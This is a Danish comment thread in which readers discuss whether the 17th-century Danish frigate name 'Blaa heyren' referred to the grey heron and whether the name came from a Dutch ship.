    Jeg undrer mig over at den danske flåde skulle have navngivet en fregat efter en amerikansk hejre (blåhejren), der ikke er særligt imponerende og som man vel også kun dårligt havde kendskab til i 1600-tallet i Danmark. Og i givet fald med et engelsk navn.

    Hed den fugl vi idag kender som fiskehejren måske blåhejren i 1600-tallet??

    I mange sprog referer fiskehejren til farven grå – gråhejren – men på hollandsk referer fiskehejren til farven blå – blauve reiger og bloureier.

    Kan i hjælpe med at finde ud af hvorfra navnet ‘Blaa heyren’ stammer?? Om det er det danske navn på fiskehejren for 300 år siden??

    Med venlig hilsen

    Stig Jürgensen

  3. Kære Stig,

    Ja, fuglen hedder “blauwe reiger” på nederlandsk. Kunne det være et nederlandsk skib? I min erfaring så oversætter men nogle gange skibsnavne, fx. et skib der hedder “De Gouden Leeuw” kan man finde i franske dokumenter som “le Lion d’Or”. Jeg er ikke historiker, jeg ved ikke hvor almindeligt det er.

    • Hej Peter
      Tak for dit hurtige svar. Jeg har først set det idag d. 20.6, fordi jeg havde ventet evt. svar/kommentarer på min email adresse.
      Jeg er ikke kommet meget videre i min eftersøgning, men har dog af en historiske interesseret flådeofficer hørt, at det i 1600-tallet ikke var ualmindeligt at ‘låne’ navne fra andre landes skibe. Hvis Danmark har lånt navnet fra et hollandsk skib, så er der nok tale om den europæiske fiskehejre og ikke om den amerikanske blåhejre – og hed den iøvrigt blue heron i 1600-tallet??
      Men du skal have tak for dit indspark

Skriv en kommentar